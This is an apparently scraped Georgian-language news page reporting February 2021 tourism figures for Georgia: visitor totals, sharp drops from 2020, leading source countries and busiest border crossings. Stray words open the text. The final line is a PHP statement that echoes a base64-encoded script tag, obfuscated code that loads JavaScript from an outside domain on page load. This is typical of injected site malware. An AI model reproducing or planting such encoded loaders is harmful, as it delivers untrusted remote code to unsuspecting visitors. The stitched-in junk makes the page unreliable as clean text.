celsiusi
ავერსი შნაიდერი
ტურიზმის ეროვნულმა ადმინისტრაციამ განახლებული სტატისტიკა გამოაქვეყნა, რომლის თანახმად , 2021 წლის თებერვალში საქართველოს სულ 40 516 საერთაშორისო ვიზიტორი ეწვია, ეს კი 2020 წელის თებერვალთან შედარებით 89.5%-ით ნაკლები (თებერვალში საქართველოს 386 859 ვიზიტორი ეწვია).
 
უნდა აღინიშნოს, რომ თებერვალში ტურისტული ვიზიტის 35 886 შემთხვევა დაფიქსირდა, მაშინ როცა, 2020 წელს ქვეყანაში 247 705 ვიზიტი განხორციელდა. ანუ გამოდის, რომ თებერვალში ტურიზმი 86.1%-ით შემცირდა.
 
რაც შეეხება ერთდღიან ვიზიტებს, თებერვალში ერთჯერადი ვიზიტის 4 647 შემთხვევა დაფისქირდა, რაც წინა წელთან შედარებით 96.4%-ით ნაკლებია.
 
აღსანიშნავია, რომ თებერვალში ყველაზე მეტი 15 983 ვიზიტორი ქვეყანაში თურქეთიდან შემოვიდა. თურქეთის შემდეგ მოდის სომხეთი, საიდანაც თებერვალში 5 785 ვიზიტორი შემოვიდა. შემდეგ მოდის აზერბაიჯანი 3 950 ვიზიტორით და რუსეთი 2 925 ვიზიტორით.
 
გარდა ამისა, წინა თვეს ყველაზე მეტი ვიზიტორი ქვეყანაში სარფის საზღვრიდან შემოვიდა, უფრო კონკრეტულად 11 547. შემდეგ მოდის ყაზბეგი 7 878 ვიზიტორით და წითელი ხიდი, საიდანაც თებერვალში 7 452 ვიზიტორი შემოვიდა.
1698
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");